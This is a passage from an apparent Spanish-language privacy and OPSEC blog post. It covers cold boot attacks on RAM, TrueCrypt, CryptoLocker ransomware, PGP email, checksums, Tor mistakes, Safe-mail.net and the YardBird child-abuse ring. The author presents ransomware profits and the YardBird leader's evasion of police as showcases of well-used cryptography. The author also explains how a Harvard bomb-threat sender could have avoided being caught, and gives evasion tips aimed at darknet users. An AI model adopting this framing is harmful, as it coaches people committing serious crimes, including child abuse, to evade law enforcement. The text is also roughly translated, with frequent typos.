trabajando en un documento confidencial, ese documento se almacena temporalmente en la memoria RAM y es vulnerable a ser extraído mientras el ordenador esté encendido. Cuando se almacena la memoria RAM, se almacena sin ningún tipo de encriptación, lo que hace que sea muy fácil de robar y un gran riesgo de seguridad. Apagar un ordenador a través de su ciclo de apagado normal generalmente pasa por un proceso de limpieza de la RAM. Sin embargo, si la computadora pierde energía abruptamente, como en un corte de energía, el ordenador no pasa por su ciclo de apagado normal y parte de la información permanece en los chips RAM desde unos segundos hasta unos minutos. Esta es una de las formas en que los ataques de arranque en frío pueden funcionar. Presentamos rápidamente un tipo de RAM que te ayudará a comprender mejor el resto de este concepto. DRAM significa memoria de acceso aleatorio dinámica. DRAM es el tipo más común de memoria de acceso aleatorio (RAM) para ordenadores personales y estaciones de trabajo. DRAM es dinámica,y a diferencia de la RAM estática (SRAM), necesita tener sus celdas de almacenamiento actualizadas o recibir una nueva carga electrónica cada pocos milisegundos. DRAM está diseñado para perder su memoria rápidamente después de perder potencia electrica. Luego hay subsecciones de DRAM llamadas DDR. Esta es una forma de hacer que la memoria esté disponible más rápidamente, pero no es realmente importante comprenderla por completo. La mayoría de ordenadores que circulan hoy en día tienen DDR2 y DDR3 en ellas a menos que sean ordenadores viejos, esto incluye ordenadores portátiles. DRAM se conoce como un tipo de memoria volátil, es la memoria del ordenador que requiere energía para mantener la información almacenada. Conserva el contenido mientras está encendido, pero cuando se interrumpe la energía, los datos almacenados se pierden rápidamente. Pero, ¿Cómo de rápido se pierden? En 2008, un grupo de investigadores quería ver la practicidad de extraer datos no encriptados de la memoria RAM en el ordenador. Argumentaron que las DRAM usadas en la mayoría de los ordenadores modernas retienen su contenido por segundos o minutos después de que se pierde la energía, incluso a temperaturas de funcionamiento o si se retiran de una placa base. Al usar una herramienta de análisis, pudieron buscar los archivos clave (como las llaves PGP) almacenados en la RAM que podrían usarse para descifrar volúmenes encriptados (unidades) en el ordenador. Con éxito pudieron descifrar volúmenes utilizando BitLocker, FileVault, dm-crypt y TrueCrypt. Contrariamente a lo que se suele suponer, las DRAM utilizadas en la mayoría de los ordenadores modernos retienen su contenido por segundos o minutos después de que se pierde la energía, incluso a temperaturas de funcionamiento e incluso si se retiran de una placa base. Aunque las DRAM se vuelven menos confiables cuando no se actualizan, no se borran de inmediato, y su contenido persiste lo suficiente para la adquisición maliciosa (o forense) de imágenes de la memoria de sistema completamente utilizables. Se demostró que este fenómeno limita la capacidad de un sistema operativo para proteger el material de claves criptográficas de un atacante con acceso físico. Se monstaron reinicios en frío para simular ataques en los sistemas de encriptación de discos populares (BitLocker, FileVault, dm-crypt y TrueCrypt) sin usar dispositivos o materiales especiales. Experimentalmente se caracterizó el alcance y la predictibilidad de la remanencia de la memoria y se informó que los tiempos de remanencia se pueden aumentar drásticamente con técnicas simples. Ofrecieron nuevos algoritmos para encontrar claves criptográficas en imágenes de memoria y corrigieron errores causados por la disminución de bits. Aunque se discutió varias estrategias para mitigar parcialmente estos riesgos, no se conoce ningún remedio simple que los elimine. Podemos ver un resumen o disfrutar del texto completo. Fue algo muy preocupante para la mayoría de la gente, y muchas personas se volvieron locas cuando se lanzó el documento de investigación en 2008 porque incluso las herramientas de encriptación difíciles como TrueCrypt podrían volverse inútiles con un ataque de este estilo. Tras un análisis posterior del documento, señalar que utilizaron SDRAM, DDR y DDR2, y no DDR3 porque no estaba disponible en ese momento. Esto provocó que TrueCrypt lanzara la siguiente declaración en su sitio web: Datos no encriptados en RAM Es importante tener en cuenta que TrueCrypt es un software de cifrado de disco que encripta solo discos, no RAM (memoria). Tenga en cuenta que la mayoría de los programas no borran el área de memoria (búferes) en la que almacenan archivos no encriptados (porciones de) que se cargan desde un volumen TrueCrypt. Esto significa que después de salir de dicho programa, los datos no cifrados con los que se trabajó pueden permanecer en la memoria (RAM) hasta que el ordenador se apague (y, según algunos investigadores, incluso durante un tiempo después de que se apage la alimentación ). También hay quee tener en cuenta que si abrimos un archivo almacenado en un volumen TrueCrypt, por ejemplo, en un editor de texto y luego forzamos el desmontaje en el volumen TrueCrypt, el archivo permanecerá desencriptado en el área de memoria (RAM) utilizada por (asignado a) el editor de texto. Esto también se aplica al desmontaje automático forzado. Intrínsecamente, las claves maestras no cifradas también deben almacenarse en la memoria RAM. Cuando se desmonta un volumen TrueCrypt no perteneciente al sistema, TrueCrypt borra las claves maestras (almacenadas en la RAM). Cuando el ordenador se reinicie limpiamente (o se apague limpiamente), todos los volúmenes TrueCrypt que no pertenecen al sistema se desmontan automáticamente y, por lo tanto, todas las claves maestras almacenadas en la memoria RAM se borran mediante el controlador TrueCrypt (excepto las claves maestras para particiones/unidades del sistema) Sin embargo, cuando la fuente de alimentación se interrumpe abruptamente, cuando la computadora se reinicia (no se reinicia limpiamente) o cuando el sistema falla, TrueCrypt deja de funcionar de forma natural y, por lo tanto, no puede borrar ninguna clave ni ningún otro dato confidencial. Además, como Microsoft no proporciona ninguna API adecuada para manejar la hibernación y el apagado, las claves maestras utilizadas para el cifrado del sistema no se pueden borrar de manera confiable (y no se borran) de la memoria RAM cuando el ordenador hiberna, se apaga o se reinicia. Para resumir, TrueCrypt no puede y no garantiza que la memoria RAM no contenga datos confidenciales (por ejemplo, contraseñas, claves maestras o datos descifrados). Por lo tanto, después de cada sesión en la que trabaja con un volumen TrueCrypt o en el que se ejecuta un sistema operativo encriptado, debe apagar (o, si el archivo de hibernación está encriptado, hibernar) la computadora y luego dejarla apagada por lo menos varios minutos (cuanto más, mejor) antes de volver a encenderlo. Esto es necesario para borrar la RAM. Supuestamente, durante 1,5-35 segundos bajo temperaturas normales de funcionamiento (26-44 ° C) y hasta varias horas cuando los módulos de memoria se enfrían (cuando el ordenador está funcionando) a temperaturas muy bajas (por ejemplo, -50 ° C). Se alega que los nuevos tipos de módulos de memoria exhiben un tiempo de desintegración mucho más corto (por ejemplo, 1,5-2,5 segundos) que los tipos anteriores (a partir de 2008). Antes de poder borrar una clave de la RAM, se debe desmontar el volumen TrueCrypt correspondiente. Para volúmenes que no son del sistema, esto no causa ningún problema. Sin embargo, dado que Microsoft actualmente no proporciona ninguna API adecuada para manejar la fase final del proceso de apagado del sistema, los archivos de paginación ubicados en volúmenes del sistema cifrados que se desmontan durante el proceso de apagado del sistema pueden contener páginas de memoria intercambiadas válidas (incluidas partes de Archivos del sistema de Windows). Esto podría causar errores de "pantallazo azul". Por lo tanto, para evitar errores de 'pantallazo azul', TrueCrypt no desmonta los volúmenes del sistema cifrado y, en consecuencia, no puede borrar las claves maestras de los volúmenes del sistema cuando el sistema se apaga o se reinicia. Algunos puntos clave para extraer de este comunicado, son, que el apagado correcto de el ordenador reduce, si no completamente, este riesgo, excepto en el caso de los discos del sistema encriptados. Lo que se entiende por esto es, por ejemplo, si nuestro sistema operativo principal es Windows y se ha cifrado esa unidad, esta es su unidad del sistema y la clave maestra para esa unidad no se borra al apagar o reiniciar. La solución es simplemente no almacenar nada sensible en el volumen de su sistema. Ya sea que utilicemos una unidad particionada o una memoria USB cifrada, solo asegúrete de que la unidad principal en la que se inicia no contenga datos confidenciales. Y si no tienes otra opción, necesitas cifrar por separado los datos dentro del volumen del sistema con una frase de contraseña diferente y una clave privada para que, incluso si entran en el volumen de nuestro sistema, no puedan acceder a los demás datos cifrados que deseamos proteger. Puedes utilizar estas mismas técnicas para buscar los archivos de clave privada de PGP en la memoria RAM, por lo que esta es una amenaza muy real en el caso de que si el ordenador todavía está encendida si vienen a buscarlo, pueden usar estas técnicas para recuperar datos del ordenador. Sin embargo, existe un debate sobre si este tipo de ataque puede persistir incluso ahora en 2018 con nuevos tipos de RAM. Si intentamos este ataque hoy en día y para probar el mismo. Llenemos la memoria con alrededor de 1000 marcadores de sombras, solo para asegurarnos que hay suficiente. Ahora cortamos la luz del ordenador. Ostensiblemente, los marcadores podrían ser reconocibles en la memoria RAM después de unos minutos, pero estamos impaciente, así que solo se espero 10 segundos para la primera prueba. Arrancamos, con la instalación mínima de Linux. Carguamos el módulo kernel: insmod ./rmem.ko. Ejecutamos nuestro "cazador". ``` Nada. ``` Eso está bien, sin embargo. Debería haber al menos alguna corrupción de datos. El tamaño del marcador predeterminado es de 128 bytes, así que establezcamos la distancia hamming en 128, lo que significa que un bit de cada byte puede voltearse. (Estadísticamente, eso equivale a una tasa de corrupción del 25%, ya que un bit dañado tiene un 50% de posibilidades de permanecer igual). ``` Nada. ``` Al parecer, en 10 segundos, la memoria estaba completamente corrupta. Probemos un intervalo más corto: 2 segundos. Mismos resultados: No queda nada de nuestra "clave de cifrado". En la prueba se afirmaba estar usando DDR3, que se sabe que mantiene la memoria por un tiempo mucho más corto que DDR2. Un nuevo trabajo de investigación publicado en septiembre de 2013 intentó reproducir los hallazgos de la investigación de 2008 pero usando computadoras con DDR1, DDR2 y DDR3 y sus hallazgos fueron interesantes. A pesar de que una máquina utiliza cifrado de disco completo, los ataques de arranque en frío pueden recuperar datos no encriptados de la RAM. Los ataques de arranque en frío se basan en el efecto de remanencia de la memoria RAM, que dice que los contenidos de la memoria no desaparecen inmediatamente después de cortar la corriente, sino que se desvanecen gradualmente con el tiempo. Este efecto se puede aprovechar reiniciando una máquina en ejecución, o trasplantando sus chips RAM en una máquina de análisis que lea lo que queda en la memoria. En teoría, este tipo de ataque se conoce desde la década de 1990. Sin embargo, solo en 2008, Halderman & al. han demostrado que los ataques de arranque en frío se pueden implementar bien en escenarios prácticos. En el trabajo en cuestión, investigaron la viabilidad de los ataques de arranque en frío. Se verificó las afirmaciones de Halderman et al. independientemente de forma sistemática. Para DDR1 y DDR2 , proporcionaron los resultados de nuestras mediciones experimentales que en gran parte concuerdan con los resultados originales. Sin embargo, también se señalo que no se pudo reproducir los ataques de arranque en frío contra los modernos chips DDR3. El conjunto de pruebas comprende 17 sistemas y configuraciones de sistema, de las cuales 5 están basadas en DDR3. ¿qué deberías hacer? Número uno, apagua siempre el ordenador cuando no estés cerca de el o colóquelo en modo de hibernación, de lo contrario, tus documentos confidenciales podrían permanecer en la memoria RAM. Simplemente bloquear la pantalla no te servirá de nada. Asegúrate de que el ordenador esta usando un tipo de RAM DDR3, si es posible. Nunca almacenes nada sensible en un volumen cifrado del sistema , ya que este ataque puede usarse para entrar en el volumen y cualquier elemento no cifrado puede recuperarse. Si estámos usando un portátil, extrae la batería para que se apague de inmediato. Si tiene tiempo, apagua el ordenador, de lo contrario, apágualo inmediatamente para que no se ejecute nada. Cuanto más tiempo puedas perder,mejor, son preciosos segundos en los que no pueden recuperar ningún dato. Así que apagua inmediatamente las cosas si no tienes tiempo suficiente para hacer un apagado correcto. Considere poner un candado en la carcasa del ordenador, y si quieres ir un paso más allá, atorníllelo al piso. De esta forma, la cantidad de tiempo que tardarían en ingresar a el ordenador desperdiciaría valiosos minutos y es más que probable que inutilice cualquier memoria recuperable. Algunas personas incluso han sugerido que sueldes la memoria RAM en la placa base para que no puedan sacarla. Esto puede ayudar a ralentizar las cosas, pero recuerda que enfriar la memoria puede conservar las cosas por bastante tiempo si estamos usando DDR1 o DDR2. Con DDR3, deberíamos estar listos y creo que con esta comprensión, los fabricantes probablemente comenzarán a buscar formas de cifrar la RAM, pero hasta ese momento debemos ser consciente de esto como un medio posible para robar nuestros datos confidenciales. Como hemos dicho, prepararse por si acaso. ## La fuerza de la criptografía y el anonimato cuando se utiliza correctamente Esta parte pretende servir como un ejemplo de cómo y cuando la criptografía y el anonimato se utilizan correctamente, puede evadir casi a cualquiera, incluidos a la policía. A estas alturas, es probable que todos hayan escuchado que alguien ha bloqueado o cifrado nuestro acceso al ordenador y el atacante nos ha obligado a pagar para su rescate (WannaCry,CryptoLocker...) Dell SecureWorks estimó que CryptoLocker afectó a 250,000 víctimas, y que el pago promedio fue de 300 € cada una. Millones en Bitcoin han sido rastreados. CryptoLocker es un troyano ransomware dirigido a ordenadores con Microsoft Windows y que apareció por primera vez en septiembre de 2013. Un ataque de CryptoLocker puede provenir de diversas fuentes, uno de ellas está disfrazada como un archivo adjunto de correo electrónico legítimo (Método cada vez más común). Un archivo ZIP adjunto a un mensaje de correo electrónico contiene un archivo ejecutable con el nombre del archivo y el icono disfrazado como un archivo PDF, aprovechando el comportamiento predeterminado de Windows de ocultar la extensión de los nombres de archivo para disfrazar la extensión real .EXE. Cuando se activa, el malware encripta ciertos tipos de archivos almacenados en unidades de red locales y montadas utilizando la criptografía de clave pública RSA para generar un par de claves RSA de 2048 bits, con la clave privada almacenada solo en los servidores de control del malware. Posteriormente, el malware muestra un mensaje que ofrece descifrar los datos si uno paga (a través de Bitcoin o un cupón prepago) si se realiza antes de una fecha límite establecida, amenazando con eliminar la clave privada si se cumplen los plazos. Si se cumplen los plazos, el malware ofrece descifrar datos a través de un servicio online proporcionado por los operadores del malware, a un precio significativamente más alto en Bitcoin. En noviembre de 2013, los operadores de CryptoLocker lanzaron un servicio online que afirma permitir a los usuarios descifrar sus archivos sin el programa CryptoLocker, y comprar la clave de descifrado una vez que expira el plazo, el proceso implica cargar un archivo cifrado en el sitio como muestra y esperar a que el servicio encuentre una coincidencia, que el sitio afirma, ocurrirá dentro de las 24 horas. Una vez que se encuentra una coincidencia, el usuario puede pagar la clave online, si la fecha límite de 72 horas ha pasado, el costo aumenta a 10 Bitcoin. Una de las razones por las que contamos esto es que CryptoLocker usa encriptación RSA 2.048, y si recuerdas en las publicaciones de PGP anteriormente en este post, recomendamos usar 4096. Incluso con encriptación de 2.048 bits, nadie ha derrotado exitosamente a CryptoLocker, este es el poder de una criptografía implementada correctamente. Utilizando los métodos adecuados de anonimato, esta persona o grupo han logrado adquirir, según una investigación realizada por ZDNet, alrededor de 41.928 BTC. En la investigación de este artículo, ZDnet trazó cuatro direcciones de bitcoin publicadas (y reubicadas) en foros por varias víctimas de CryptoLocker, mostrando un movimiento de 41.928 BTC entre el 15 de octubre y el 18 de diciembre. Como se puede ver, la criptografía y el anonimato correctamente ejecutados permitieron que este grupo de personas adquiriera el equivalente de Bitcoin de casi $ 42 millones de aquel entonces en solo 4 meses. No estamos recomendando que hagais esto, simplemente estamos dando un ejemplo perfecto de cuán poderosa es la combinación de estos dos factores muy importantes en la protección de cualquier persona online cuando se usa correctamente. ## Direcciones de correo electrónico PGP / GPG Mucha gente usa direcciones de correo electrónico reales. Me gustaría recordar a todos, que cuando le das a alguien tu clave pgp/gpg, pueden ver la dirección de correo electronico que asociaste a esa clave. No se supone que uses cualquier tipo de servicio de correo electrónico de clearnet como: gmail, yahoo, hotmail, etc. Si quieres usar una dirección de correo electrónico válida, entonces necesitas usar un proveedor de correo electrónico que soporte Tor y el anonimato. Por ejemplo, uso Safe-Mail. Puedes acceder a este servicio de correo electrónico desde Tor, lo que te permite permanecer en el anonimato. ### Bajo ninguna circunstancia asocies una dirección en claro con tu clave PGP/GPG. Definición de DOX: Información personal sobre personas en Internet, que a menudo incluyen nombre real, alias conocidos, direcciones, número de teléfono, SSN, número de tarjeta de crédito, etc. ### Otro correo electrónico de estafa, cuidado Una cosa que debes tener en cuenta es que cualquier tipo de anuncio legal y honesto, se firma de PGP. Compruebe siempre si hay una firma de PGP, y si no la hay, solicita amablemente al administrador o moderador de los sitios que vuelva a enviar el mensaje con una firma. Protéjete al verificar el nombre y asegúrate de que cualquier usuario tenga una cierta reputación ¡Cuidado! ## Una introducción a MD5 Plus y SHA-1 Las personas que se mantienen anónimas online. Utilizan el control online, "The Grugq". Cabe señalar que Grugq estuvo en algún momento en la nómina del gobierno de Estados Unidos por encontrar y vender exploits de zero day. Si recuerdamos la publicación anterior sobre cómo el gobierno federal de EE.UU. es el comprador más importante de malware en el mundo, bueno, pues Grugq fue uno de esos que vendió malware al gobierno. Desafortunadamente para él, cuando se dio a conocer al público, el gobierno ya no quería comprar malware porque les gusta mantener su propio anonimato al comprar estos exploits. Grugq nos cuenta la historia mediante su biografía: The Grugq es un profesional de la seguridad de la información que ha trabajado como forense digital, realizando ingeniería inversa binaria, rootkits, voz sobre IP, telecomunicaciones y seguridad financiera. Por último, pero no menos importante, también ha hablado en varias conferencias de seguridad. Desarrolló Hash (hacker shell), una herramienta que permite a las personas evadir la detección al penetrar en un sistema. Ha lanzado un software de ataque VoIP.... ¿Por qué estamos hablando de Grugq? ¿A quien le importa? Bueno, él tiene la mejor información sobre mantenerse anónimo y mantener la privacidad online y es alguien con quien todos deberíamos estar familiarizados. Escribe publicaciones de blog y ha realizado presentaciones de video en conferencias de seguridad y hackers, y su presentación más famosa. La presentación dura aproximadamente 1 hora y es esencial para todos los que desean mantener su anonimato online. [Vídeo](https://www.youtube.com/watch?v=S8GPTvq1m-w) Si descargamos el video, podemos comprobar: SHA1: 1a9e6c67a527b42a05111e1b18c7a037744bb51e MD5: b6de41da8d1fca2fabf725f79d2a90df Una vez que hayamos descargado el archivo, podemos comprobar algo llamado suma de comprobación del archivo. La suma de verificación es donde el contenido de todo el archivo se conecta a un algoritmo matemático y genera una cadena específica. Podemos ver las dos cadenas de arriba. Esto es algo que de lo que debemos tener el hábito de hacer cuando sea posible. Si recordamos cuándo hablamos sobre archivos de firma y PGP, este es otro método para verificar las descargas pero no tan bueno como los archivos de firma. Sin embargo, siempre que se proporcione debemos realizarlo para verificar nuestras descargas cuando la combinación de archivo de firma + PGP no esté disponible. Una vez que hayamos descargado el archivo en Tails, lo primero que debe hacer es mover el archivo que hemos descargado a la carpeta tmp. Para hacerlo, busca en la parte superior y haga clic en Lugares -> Equipo -> Sistema de archivos -> tmp . Aquí es donde se mueven el archivo descargado, y para facilitar las cosas, renombramos el archivo grugq.zip. A continuación, vamos a abrir una ventana de terminal (como un mensaje de DOS) haciendo clic en el ícono de rectángulo negro en el área central superior izquierda de Tails. Una vez que hayamos abierto nuestra ventana de terminal, vamos a realizar algunos comandos de Linux. cd /tmp : Esto cambiará el directorio actual que está operando dentro del terminal a nuestra carpeta tmp y nos permitirá acceder más fácilmente a los archivos en esa carpeta. sha1sum grugq.zip : Esto realizará una suma de comprobación SHA1 en el archivo que acabmos de descargar, podemos ver por qué queríamos cambiar el nombre del archivo. Debería darnos el mismo resultado que la suma de SHA1 enumerada anteriormente. md5sum grugq.zip : Esto realizará una suma de comprobación MD5 en el archivo que acabamos de descargar, y es otra forma de verificar el archivo. SHA1 es mejor porque es más difícil producir el mismo resultado dos veces con diferentes contenidos de archivo usando SHA1 versus MD5, pero no obstante, usa ambos siempre que sea posible y siempre verifica tus archivos descargados. [Vídeo](https://www.youtube.com/watch?v=t3uhBcN-dBQ) De acuerdo, suponiendo que nuestro video descargado pasase la prueba de suma de comprobación, podemos estar seguro de que el archivo de video que descargamos no ha sido alterado o se ha inyectado ningún código malicioso. Cuando se cambia un solo carácter en el código fuente de un archivo determinado, la salida de suma de comprobación será completamente diferente. La diferencia siempre es bastante grande y es por eso que realizamos sumas de verificación como forma importante de verificar nuestras descargas. ## Cosas obvias cuando estas usando TOR En esta parte hablaremos sobre un error del que todos podemos aprender, cuando un estudiante de Harvard envió por correo electrónico con una amenaza de bomba a la escuela mientras usaba Tor para evitar un examen final. ... el estudiante "tomó medidas para disfrazar su identidad" mediante el uso de Tor, un software que permite a los usuarios navegar en la web de forma anónima, y Guerrilla Mail, un servicio que permite a los usuarios crear direcciones de correo electrónico gratuitas y temporales. A pesar del objetivo de anonimato de Eldo Kim, de 20 años, sus intentos de enmascarar su identidad llevaron a las autoridades a la puerta de su casa. ¿Significa eso que Tor falló? En lo mas minimo. Si bien el estudiante de Harvard sí utilizó Tor, fueron sus otras medidas de seguridad descuidadas las que llevaron a su arresto. La demanda dice que la universidad "pudo determinar que, en las horas previas a la recepción de los mensajes de correo electrónico ... Eldo Kim accedió a Tor utilizando la red inalámbrica de Harvard. Lo que Kim no se dio cuenta es que Tor, que enmascara la actividad online, no oculta el hecho de que se está usando el software. Al analizar los encabezados de los correos electrónicos enviados a través de la cuenta de Guerrilla Mail, las autoridades pudieron determinar que el remitente anónimo estaba conectado a la red TOR. Usando esa conclusión, intentaron descubrir qué estudiantes habían estado utilizando Tor en la red inalámbrica de Harvard en el momento de las amenazas. Antes de lanzar TOR, Kim tuvo que iniciar sesión en el sistema inalámbrico de la escuela, lo que requiere que los usuarios se autentiquen con un nombre de usuario y contraseña. Al revisar los registros de red y buscar usuarios que se conectaran a las direcciones IP conocidas públicamente como parte de la red TOR, la universidad pudo correlar entre los usuarios que usaban TOR y su conexión inalámbrica en el momento en que las amenazas de bomba fueron recibidos. No nos queda mucho más que añadir, aparte de que si planeas hacer hacktivismo o simplemente usar DarkNet, asegúrate de que puedes hacerlo cuando el uso de TOR no levante sospechas. En el caso de este estudiante, era probable que fuera el único estudiante de Harvard que usaba TOR en el momento en que se envió este correo electrónico, y cuando las autoridades llegaron a su dormitorio. Probablemente nunca lo hubieran atrapado, pero recuerde que cuando usas TOR, otros pueden ser conscientes de que lo estás usando. Una mejor idea para él habría sido conectarse a otra ordenador remotamente y tener ese ordenador conectado a la red para enviar el correo electrónico. De esta forma, nunca podrían haber visto el ordenador conectada a TOR. No me preocuparía de utilizar TOR regularmente desde su casa, porque hay cientos de miles de usuarios de TOR, pero de nuevo, es algo a tener en cuenta. ## ¿Estás usando safe-mail.net? Si eres un usuario de la DarkNet, probablemente hayas visto a muchos usuarios abogar por el uso de un servicio llamado Safe-Mail.net. Esta compañía se describe a sí misma como "el sistema de comunicación más seguro y fácil de usar", y muchos usuarios de la DeepWeb la han adoptado. Pero hay algunas cosas que debemos tener en cuenta. Los usuarios conocidos del servicio web de Safe-mail incluyen operadores, vendedores y clientes de muchos sitios del mercado de la DarkNet. Cuando me comuniqué con Safe-mail para comentar, Amiram Ofir, presidente y CEO de Safe-mail, respondió en un correo electrónico que la compañía y sus empleados "ciertamente no están al tanto de ninguna actividad criminal" y agregó que la compañía sigue las órdenes emitidas en Israel por un tribunal israelí. Cualquier otra agencia de aplicación de la ley debe ponerse en contacto con las autoridades israelíes. Vale la pena señalar, sin embargo, que Israel firmó un Tratado de Asistencia Legal Mutua (MLAT) con los EE.UU. en 1998, y que se utilizó una solicitud MLAT para obtener una imagen del servidor web Silk Road, según la querella penal del 27 de septiembre de 2013. Ofir comentó que las comunicaciones entre los usuarios y el servicio web están protegidas por SSL, y que la información almacenada en el servidor está encriptada con claves específicas del usuario. Cuando se le preguntó si Safe-mail había recibido órdenes judiciales emitidas por un tribunal israelí en nombre de una agencia de aplicación de la ley no israelí, como el FBI, Ofir respondió con un breve "Sí". Es probable que Safe-mail les den todo lo que necesitan para leer los correos electrónicos. Por lo tanto, debemos recordar que no se debe confiar en este servicio de correo electrónico. Ningún servicio de correo electrónico irá a la cárcel por ti. Y si enviamos algo sensible por correo electrónico utilizando texto sin formato, es probable que lo lea alguien que no sea el destinatario. Esta es la razón por la cual cosas como el fuerte cifrado PGP son esenciales para cualquier tipo de comunicación sensible. Con esto, se debe tener en cuenta que Safe-Mail no es más seguro que Gmail cuando se trata de proteger nuestra privacidad con nuestro servicio de correo electrónico centralizado. Nunca confíes tu privacidad en ninguna compañía, siempre encripta todo. ## Otro ejemplo de cómo la criptografía robusta puede proteger a cualquiera Sí, leíste el título correctamente. Usando los mismos tipos de técnicas que hemos visto en el post, podemos y debemos permanecer en el anonimato sin importar lo que estemos haciendo. Los pedófilos y los pornógrafos infantiles son algunas de las personas más buscadas y despreciadras del planeta. Son cazados por agencias federales castigados muy seriamente (Menos castigados de lo que yo los castigaría). Entonces, el motivo de este parte del post es demostrar que cualquiera puede permanecer libre y en el anonimato si utiliza la ciberseguridad y la OpSec de forma adecuada. En ciberseguridad, si tu plataforma de comunicaciones segura no está siendo utilizada por terroristas o pedófilos, probablemente no estemos usando la herramienta adecuada en cuanto a ciberseguridad nos referimos. Quiero hablarte sobre un grupo de pornógrafos infantiles que operaron durante varios años online, llamado YardBird. Durante un período de 15 meses, hubo alrededor de 400,000 imágenes y 11,000 videos cargados en un servidor central administrado por el grupo y compartido por los miembros. La razón por la que sabemos eso, es porque durante esos 15 meses, el FBI realizó una operación encubierta para infiltrarse en el grupo con la esperanza de detener a los miembros. Capturaron con éxito a 1 de cada 3 miembros del grupo. Un usuario de los que sigue libre hasta la fecha, es el líder del grupo, que también usaba el nombre online YardBird. ¿Cómo es posible que después de tantos esfuerzos por parte de la Oficina Federal de Investigaciones (FBI), la Policía Federal Australiana (AFP) y el Servicio de Policía de Queensland australiano, las personas de alto rango en las listas de personas buscadas pudieron evadir la captura? . Utilizaron criptografía fuerte y reglas de ciberseguridad apropiadas. Ahora hablemos sobre la historia del intento de aprehensión de este grupo. De acuerdo con el FBI. Hubo aproximadamente 60 miembros que se identificaron de manera general, y de los 60, aproximadamente 20 se identificaron positivamente en este grupo. Hubo numerosos desafíos presentados durante la Operación Aquiles. El grupo utilizó un nivel de organización y sofisticación sin precedentes. Tuvieron una prueba cronometrada para posibles nuevos miembros. Tuvieron que usar tecnología de cifrado y anonimizadores basados en Internet, servicios de reenvío. También dañaron intencionalmente sus propios archivos de pornografía infantil y solo los nuevos miembros sabían cómo reconfigurar esos archivos para poder leer las imágenes o el video. También tenían la extraña habilidad de monitorizar las noticias mundiales relacionadas con los esfuerzos de aplicación de la ley en materia de pornografía infantil a fin de educarse mejor para evitar la detección de la aplicación de la ley. Como dije antes, el presunto líder de este anillo usó el nombre online "Yardbird". Yardbird volvió a aparecer en Usenet en 2009 y 2010 en la fecha correspondiente al primer y segundo aniversarios de los arrestos en 2008. Su intención era mostrar que todavía era libre y responder a las preguntas de los usuarios. Una de las cosas más importantes que declaró Yardbird fue que todos los integrantes del grupo que usaban TOR y los remailers permanecían libres, mientras que los que dependían de servicios como Privacy.li fueron arrestados y condenados. Privacy.li fue un servicio VPN offshore que prometía el anonimato. Reclaman de su sitio web lo siguiente. Yardbird comentó además que varios miembros del grupo, incluido su segundo al mando Christopher Stubbings (Helen) y Gary Lakey (Berenjena), eran usuarios de Privacy.li, de hecho, afirmaron que lo usaban para todo. (Actualmente Helen cumple una condena de 25 años en el Reino Unido, mientras que Berenjena está cumpliendo cadena perpetua en una prisión de Arizona). Berenjena, literalmente, se hizo notar por su constante promoción de la Privacidad. Se jactaba continuamente de que no podía ser atrapado porque Privacy.li no mantenía registros, y se encontraban fuera de la jurisdicción de los EE.UU. Si bien hubo cierto grado de privacidad, no hubo ningún anonimato en absoluto, por lo que realmente no fue una sorpresa que los clientes de Privacy.li estuvieran entre los arrestados. (Repetimos) Al final del día, ningún proveedor de servicios irá a la cárcel por ti. Una simple orden judicial puede hacer que incluso los proveedores de VPN más duros se deshagan de los usuarios, porque preferirían traicionar a un usuario de 20 €/mes antes de ser multados, cerrados y posiblemente encarcelados por interferir con una investigación federal. ¿Qué otros errores se hicieron para conducir al arresto de algunos miembros de este grupo? La policía australiana arrestó a un hombre por cargos de pornografía infantil totalmente ajenos, y presumiblemente como parte de un acuerdo con el fiscal, reveló la existencia de "el grupo" y entregó un par de claves pública / privada de PGP y una contraseña. Al haber adquirido del informante el par de llaves públicas / privadas del grupo actual de PGP, y su frase de contraseña, la policía podía asumir la identidad de este miembro del grupo y, además, leer todo el tráfico encriptado publicado por los miembros del grupo. Una vez que el grupo fue vulnerable, la policía pudo aprovechar algunos factores: 1. Tenían la computadora del informante, con todo su correo electrónico, claves PGP. Esto proporcionó una historia, lo que hizo más fácil continuar la interpretación. 2. En el momento en que el grupo fue penetrado, el grupo había estado operando durante aproximadamente 5 años. En este momento, el grupo se había convertido en una comunidad: la gente estaba familiarizada el uno con el otro, a menudo bajando las defensas,lo que hacia que a veces revelaran fragmentos de información personal. Esto se dá especialmente cuando uno piensa que sus mensajes son seguros, y más allá de la capacidad de la policía para interceptar, dirían cosas que nunca dirian publicamente. Por lo tanto, es importante tener en cuenta en este momento que no importa qué tan cómodo te sientas con alguien, siempre hay una posibilidad de que puedan comprometerte. De hecho, el grupo tenia un conjunto de reglas, a todos los miembros se les dijo que obedecieran, y si se descubría que algún miembro violaba las siguientes reglas, serían expulsados: - Nunca revelar la verdadera identidad a otro miembro del grupo - Nunca se comunique con otro miembro del grupo fuera del canal de Usenet - La membresía grupal se mantiene estrictamente dentro de los límites de Internet - Ningún miembro puede identificar positivamente a otro - Los miembros no revelan información de identificación personal - El grupo de noticias de comunicaciones primarias se migra regularmente - Si un miembro infringe una regla de seguridad, por ejemplo, no encripta un mensaje, será expulsado - En cada migración de grupo de noticias, crear un nuevo par de claves PGP, desvincularse de los mensajes anteriores - Cada miembro se creará un nuevo sobrenombre Los que fueron atrapados, fueron los que no siguieron las reglas al confiar demasiado en sus "amigos" online. Vimos esto en el arresto de Sabu cuando ayudó al FBI a arrestar a sus "amigos" en LulzSec. Si a alguien se le da un trato para reducir la cantidad de tiempo que pasa en prisión a la mitad, es probable que acepte el trato a costa tuya. A continuación se muestra un ejemplo de un alegato versus tratar de luchar contra los cargos en este caso concreto. ... siete de los sujetos estadounidenses se declararon culpables antes del juicio a una acusación de 40 cargos y recibieron sentencias federales que iban de 13 a 30 años en prisión. Los siete acusados restantes optaron por un juicio conjunto y simultáneo. Los siete fueron condenados por un jurado y posteriormente sentenciados a cadena perpetua. 13-30 años frente a cadena perpetua, pueden tentar incluso a algunos de los criminales más duros, y si crees que tu "amigo" online que nunca has conocido en persona va a mantener la boca cerrada para mantenerte fuera de la cárcel, sería gran sorpresa. Como pueden ver, el grupo era prácticamente un libro abierto para la policía. Fueron complometidos y completamente penetrados. Sin embargo, a pesar de eso, la mayoría del grupo todavía permanece en libertad, y no fueron identificados ni arrestados. Esto se debe a las herramientas de privacidad (pgp, tor, nymservers, remailers) que se emplearon. Incluso siendo todo lo demás un libro abierto, aquellos que usan estas herramientas aún logran evadir la captura. Pero todabia puede estar diciendo: Ok, entiendo PGP, lo entiendo, pero ¿qué diablos es un servidor de ny y un remailer? En pocas palabras, un remailer anónimo es un servidor que 